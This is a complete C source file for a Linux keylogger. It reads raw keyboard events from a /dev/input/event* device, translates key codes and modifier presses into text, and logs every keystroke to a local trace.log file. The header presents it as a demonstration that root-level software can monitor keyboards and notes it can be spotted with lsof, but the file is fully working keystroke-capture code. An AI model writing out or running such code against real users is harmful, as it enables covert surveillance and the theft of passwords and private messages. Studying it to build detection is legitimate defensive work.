/* keylogger.c
 *
 * Copyright (c) 2011 Michael Bonfils <murlock42@gmail.com>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details. 
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, write to the
 * Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
 * Boston, MA  02110-1301  USA.
 */





#define STR_NAME "KeyLogger with /dev/input/*"
#define STR_VERSION "0.1"
#define STR_AUTHOR "Michael Bonfils / Murlock"


/*
	TODO
		- in logfile, insert current keymap (in debian, it can be extracted from /etc/default/keyboard )
		- add option to filtering captured events (hide for example all arrows/FnKeys/... events)
*/


/*
Description: 
	This program is intended to show that any root software can monitor event keyboards.
	This program can be detected by runninf lsof /dev/input/event*
	This program extract only raw event, you have to translate it to current keyboard mapping
*/
		

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

#include <sys/types.h>
#include <pwd.h>
#include <grp.h>
#include <error.h>
#include <string.h>

#include <linux/input.h>

typedef struct {
	int from_code;
	char *to_char;
} item;

// Maybe there is something very very more simpler than that ? maybe libhid ?
item array[] = {
	{ KEY_1, "1" },
	{ KEY_2, "2" },
	{ KEY_3, "3" },
	{ KEY_4, "4" },
	{ KEY_5, "5" },
	{ KEY_6, "6" },
	{ KEY_7, "7" },
	{ KEY_8, "8" },
	{ KEY_9, "9" },
	{ KEY_0, "0" },
	{ KEY_KP1, "1" },
	{ KEY_KP2, "2" },
	{ KEY_KP3, "3" },
	{ KEY_KP4, "4" },
	{ KEY_KP5, "5" },
	{ KEY_KP6, "6" },
	{ KEY_KP7, "7" },
	{ KEY_KP8, "8" },
	{ KEY_KP9, "9" },
	{ KEY_KP0, "0" },
	{ KEY_KPPLUS, "+" },
	{ KEY_KPMINUS, "-" },
	{ KEY_KPSLASH, "/" },
	{ KEY_KPENTER, "\n" },
	{ KEY_KPDOT, "." },
	{ KEY_KPASTERISK, "*" },
	{ KEY_A, "a" },
	{ KEY_B, "b" },
	{ KEY_C, "c" },
	{ KEY_D, "d" },
	{ KEY_E, "e" },
	{ KEY_F, "f" },
	{ KEY_G, "g" },
	{ KEY_H, "h" },
	{ KEY_I, "i" },
	{ KEY_J, "j" },
	{ KEY_K, "k" },
	{ KEY_L, "l" },
	{ KEY_M, "m" },
	{ KEY_N, "n" },
	{ KEY_O, "o" },
	{ KEY_P, "p" },
	{ KEY_Q, "q" },
	{ KEY_R, "r" },
	{ KEY_S, "s" },
	{ KEY_T, "t" },
	{ KEY_U, "u" },
	{ KEY_V, "v" },
	{ KEY_W, "w" },
	{ KEY_X, "x" },
	{ KEY_Y, "y" },
	{ KEY_Z, "z" },
	{ KEY_TAB, "<TAB>" },
	{ KEY_ENTER, "\n" },
	{ KEY_SPACE, " " },
	{ KEY_BACKSPACE, "<BACKSPACE>" },
	{ KEY_DELETE, "<DELETE>" },
	{ KEY_INSERT, "<INSERT>" },
	{ KEY_CAPSLOCK, "<CAPSLOCK>" },
	{ KEY_FN_F1, "<FN1>" },
	{ KEY_FN_F2, "<FN2>" },
	{ KEY_FN_F3, "<FN3>" },
	{ KEY_FN_F4, "<FN4>" },
	{ KEY_FN_F5, "<FN5>" },
	{ KEY_FN_F6, "<FN6>" },
	{ KEY_FN_F7, "<FN7>" },
	{ KEY_FN_F8, "<FN8>" },
	{ KEY_FN_F9, "<FN9>" },
	{ KEY_FN_F10, "<FN10>" },
	{ KEY_FN_F11, "<FN11>" },
	{ KEY_FN_F12, "<FN12>" },
	{ KEY_SYSRQ, "<SYSRQ>" },
	{ KEY_PAUSE, "<PAUSE>" },
	{ KEY_F1, "<F1>" },
	{ KEY_F2, "<F2>" },
	{ KEY_F3, "<F3>" },
	{ KEY_F4, "<F4>" },
	{ KEY_F5, "<F5>" },
	{ KEY_F6, "<F6>" },
	{ KEY_F7, "<F7>" },
	{ KEY_F8, "<F8>" },
	{ KEY_F9, "<F9>" },
	{ KEY_F10, "<F10>" },
	{ KEY_F11, "<F11>" },
	{ KEY_F12, "<F12>" },
	{ KEY_PAGEUP,"<PAGEUP>" },
	{ KEY_PAGEDOWN,"<PAGEDOWN>" },
	{ KEY_HOME, "<HOME>" },
	{ KEY_END, "<END>" },
	{ KEY_UP, "<UP>" },
	{ KEY_DOWN, "<DOWN>" },
	{ KEY_LEFT, "<LEFT>" },
	{ KEY_RIGHT, "<RIGHT>" },
	{ KEY_MINUS, "-" },
	{ KEY_EQUAL, "=" },
	{ KEY_ESC, "<ESC>" },
	{ KEY_LEFTBRACE, "{" }, //TESTME
	{ KEY_RIGHTBRACE, "}" }, //TESTME
	{ KEY_SEMICOLON, ";"}, // TESTME
	{ KEY_GRAVE, "`" }, // TESTME	
	{ KEY_COMMA, "," }, // TESTME
	{ KEY_DOT,"." }, // TESTME
	{ KEY_SLASH,"/" }, // TESTME
	{ KEY_102ND,"<" },// TESTME
	{ -1, NULL } };

item has_modifiers[] = {
	{ KEY_LEFTALT, "<LEFTALT=%d>" },
	{ KEY_RIGHTALT, "<RIGHTALT=%d>" },
	{ KEY_LEFTSHIFT, "<LEFTSHIFT=%d>" },
	{ KEY_RIGHTSHIFT, "<RIGHTSHIFT=%d>" },
	{ KEY_LEFTCTRL, "<LEFTCTRL=%d>" },
	{ KEY_RIGHTCTRL, "<RIGHTCTRL=%d>" },
	{ KEY_LEFTMETA, "<LEFTMETA=%d>" },
	{ KEY_RIGHTMETA, "<RIGHTMETA=%d>" },
	{ KEY_COMPOSE, "<COMPOSE=%d>" },
	{ -1, NULL } };


void freesecure( char **X ) {
	if ( *X ) free( *X );
	*X = NULL;
}

char* test_modifiers( int code ) {
	int i=0;

	while ( has_modifiers[i].from_code != -1 && has_modifiers[i].from_code != code )
		i++;
	return has_modifiers[i].to_char;
}

char* convert_code2char( int code ) {
	int i=0;

	// this test is only used when we want to see unknow event withouth getting modifiers event
	if ( test_modifiers( code )!=NULL ) {
		return NULL;
	}

	while ( array[i].from_code != -1 && array[i].from_code != code )
		i++;
	
	if ( array[i].to_char == NULL )
		printf( "Failed to convert code %d\n", code );
	
	return array[i].to_char;
}

int show_info( int fd ) {
	int r;
	struct input_id input_id;
	r = ioctl( fd, EVIOCGID, &input_id );
	if ( r == 0 ) {
		printf( "BusType : %d\n", input_id.bustype );
		printf( "Vendor  : %d\n", input_id.vendor  );
		printf( "Product : %d\n", input_id.product  );
		printf( "Version : %d\n", input_id.version  );
	}

	char name[80];
	r = ioctl( fd, EVIOCGNAME( sizeof(name) ),  name );
	if ( r >= 0 ){
		printf( "Name : %s\n", name );
	} else {
		printf( "Name  has returned : %d / errno = %s\n", r, strerror( errno ) );
	}

	r = ioctl( fd, EVIOCGPHYS( sizeof(name) ), name );
	if ( r >= 0 ){
		printf( "Physical Location : %s\n", name );
	} else {
		printf( "Physical Location has returned : %d / errno = %s\n", r, strerror( errno ) );
	}


	r = ioctl( fd, EVIOCGUNIQ( sizeof(name) ), name );
	if ( r >= 0 ){
		printf( "Unique Identifier : %s\n", name );
	} else {
		printf( "Unique Identifier has returned : %d / errno = %s\n", r, strerror( errno ) );
	}

	return 0;
}


int main( int argc, char *argv[] ) {

#ifdef DEBUG
	extern char **environ;
	char **ptr = environ;
	while ( *ptr ) {
		printf( "%s\n", *ptr );
		ptr++;
	}
#endif

#ifdef USE_UDEV
	// TODO, parse all entries in /dev/input to found correct item for keyboard if DEVNAME is empty
	const char *input = getenv("DEVNAME"); // DEVNAME is something like /dev/input/event2
#else

	char *input = NULL;
	if ( argc >= 2 ) input = argv[1];
#endif
	if ( input == NULL ) {
		printf( "%s : No input provided, exiting...\n", STR_NAME );
		exit( 0 );
	}

	int fd = -1, retry = 0;

 	// trying to open input, may be not available the first time
	while ( fd == -1 ) {
		fd= open( input, O_RDONLY );
		if ( fd == -1 ) {
			if ( retry>5 ) {
				printf( "Failed to open %s : %d %s\n", input, errno, strerror( errno ) );
				exit( -1 );
			}
			retry++;
			sleep( 1 );
		}
	}


// by default, the input is shared so this code is unnecessary
#if 0
	// try to grab device, share input with other softwares
	// check /usr/include/linux/input.h
	int rc = ioctl( fd, EVIOCGRAB, 0 );
	if ( rc != 0 ) {
		printf( "Failed to grab %s, event will be shared : %d %s\n", input, errno, strerror( errno ) );
	}
#endif


	show_info( fd );


	// check Documentation/input/input.txt
	struct input_event mem;

	FILE *fp = fopen( "trace.log", "w" );
	// we have to extract current keyboard configuration
	FILE *in = fopen( "/etc/default/keyboard", "r" );
	if ( in ) {
		char line[80];
		while( fgets( line, sizeof(line), in ) ) {
			if ( strstr( line, "XKBLAYOUT=" ) )
				fprintf( fp, "Detected default keyboard layout :\n%s\n", line );
		}
		fclose( in );
	}


	int quit = 0;
	while ( !quit ) {
		int r = read( fd, &mem, sizeof(mem) );
		if ( r>0 && r != sizeof(mem) ) {
			printf( "partial read\n" );
		} else if ( r == sizeof(mem) ) {

			// we check that we have a key event
			if ( mem.type == EV_KEY ) {
				// is it a regular char ?
				char *c = convert_code2char( mem.code );
				if ( c && mem.value==1 ) { // print it only if key is set
					fprintf( fp, "%s", c );
					fflush( fp );
				}
				// is it a special key (Shit,Left, ... )
				c = test_modifiers( mem.code );
				if ( c && ( mem.value == 0 || mem.value == 1) ) { // print it only if press or release, not repeat event
					fprintf( fp,  c, mem.value );
					fflush( fp );
				}
			}
			
		
		} else if ( r == 0 ) {
			printf( "empty read\n" );
		} else {
			printf( "error has occured : %d %s\n", errno, strerror( errno ) );
			quit = 1;
		}
	}

	close( fd );
	fclose( fp );
	return 0;
}
